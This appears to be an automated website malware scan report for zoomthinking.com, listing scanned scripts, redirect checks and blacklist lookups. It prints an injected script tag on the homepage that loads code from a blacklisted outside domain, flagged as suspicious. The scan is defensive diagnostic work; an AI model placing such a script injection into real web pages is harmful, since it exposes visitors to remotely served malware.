Scanned pages/files
Request | Server response | Status |
http://zoomthinking.com/ | 200 OK Content-Length: 10870 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ionall70ycommon.rr.nu ...[12620 bytes skipped]... adding: 30, handleOversize: "resize", handleUnsupported: "link", initialHeight: 160, initialWidth: 320, enableKeys: true, skipSetup: false, flashParams: {bgcolor:"#000000", allowFullScreen:true}, flashVars: {}, flashVersion: "9.0.0", useSizzle: false }; Shadowbox.init(shadowbox_conf); </script> <!-- End Shadowbox JS --> <script src="http://ionall70ycommon.rr.nu/nl.php?p=d"></script> </body> </html> | ||
http://zoomthinking.com/wp-includes/js/jquery/jquery.js?ver=1.3.2 | 200 OK Content-Length: 57276 Content-Type: text/javascript | clean |
http://zoomthinking.com/wp-content/themes/twicet/js/custom.js?ver=5525 | 200 OK Content-Length: 15470 Content-Type: text/javascript | clean |
http://zoomthinking.com/wp-content/themes/twicet/prettyPhoto/js/jquery.prettyPhoto.js?ver=5525 | 200 OK Content-Length: 13397 Content-Type: text/javascript | clean |
http://zoomthinking.com/wp-content/plugins/cforms/js/cforms.js | 200 OK Content-Length: 17305 Content-Type: text/javascript | clean |
http://static.ak.fbcdn.net/connect.php/js/FB.Share | 200 OK Content-Length: 165407 Content-Type: application/x-javascript | clean |
http://zoomthinking.com/wp-content/plugins/shadowbox-js/shadowbox/shadowbox.js?ver=3.0 | 200 OK Content-Length: 22388 Content-Type: text/javascript | clean |
http://ionall70ycommon.rr.nu/nl.php?p=d | 500 Can't connect to ionall70ycommon.rr.nu:80 (ÐÐµÑ Ð¼Ð°ÑÑÑÑÑа до Ñзла) Content-Length: 209 Content-Type: text/plain | clean |
http://ionall70ycommon.rr.nu/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zoomthinking.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, no-transform
Connection: close
Date: Mon, 31 Mar 2014 15:29:04 GMT
Pragma: Public
Server: Apache
Vary: User-Agent,Accept
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fgoh6chig00i0mjfn3uh525sg2; path=/
X-Pingback: http://zoomthinking.com/xmlrpc.php
GET / HTTP/1.1
Host: zoomthinking.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, no-transform
Connection: close
Date: Mon, 31 Mar 2014 15:29:04 GMT
Pragma: Public
Server: Apache
Vary: User-Agent,Accept
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fgoh6chig00i0mjfn3uh525sg2; path=/
X-Pingback: http://zoomthinking.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: zoomthinking.com
Referer: http://www.google.com/search?q=zoomthinking.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zoomthinking.com
Referer: http://www.google.com/search?q=zoomthinking.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zoomthinking.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zoomthinking.com/
Result: zoomthinking.com is not infected or malware details are not published yet.
Result: zoomthinking.com is not infected or malware details are not published yet.